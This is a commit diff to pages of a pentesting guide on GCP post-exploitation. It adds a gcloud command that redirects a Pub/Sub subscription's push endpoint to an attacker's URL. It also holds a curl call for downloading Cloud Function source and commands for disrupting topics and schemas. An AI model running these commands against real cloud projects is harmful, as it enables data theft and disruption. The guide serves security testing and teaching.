GITBOOK-621: No subject

pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md

@@ -30,7 +30,7 @@ With this permission you can get a **signed URL to be able to download the sourc
 {% code overflow="wrap" %}
 ```bash
 curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
--H "Authorization: bearer $(gcloud auth application-default print-access-token)" \
+-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
 -H "Content-Type: application/json" \
 -d '{}'
 ```

pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md

@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -86,22 +86,20 @@ gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
 gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
 ```
 
-### &#x20;`pubsub.subscriptions.update`
+### `pubsub.subscriptions.update`
 
 Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.
 
+{% code overflow="wrap" %}
+```bash
+gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>
+```
+{% endcode %}
+
 ### `pubsub.subscriptions.setIamPolicy`
 
 Give yourself the permissions needed to perform any of the previously commented attacks.
 
-### `pubsub.schemas.delete`
-
-Delete a schema to be able to send messages that doesn't fulfil with the schema:
-
-```bash
-gcloud pubsub schemas delete <SCHEMA NAME>
-```
-
 ### `pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)
 
 Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted.\
@@ -134,11 +132,19 @@ gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
  --message-encoding=json
 ```
 
+### `pubsub.schemas.delete`
+
+This might look like deleting a schema you will be able to send messages that doesn't fulfil with the schema. However, as the schema will be deleted no message will actually enter inside the topic. So this is **USELESS**:
+
+```bash
+gcloud pubsub schemas delete <SCHEMA NAME>
+```
+
 ### `pubsub.schemas.setIamPolicy`
 
 Give yourself the permissions needed to perform any of the previously commented attacks.
 
-### `pubsub.snapshots.create`,  `pubsub.snapshots.seek`
+### `pubsub.snapshots.create`, `pubsub.snapshots.seek`
 
 This is will create a snapshot of all the unACKed messages and put them back to the subscription. Not very useful for an attacker but here it's:
 
@@ -158,7 +164,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>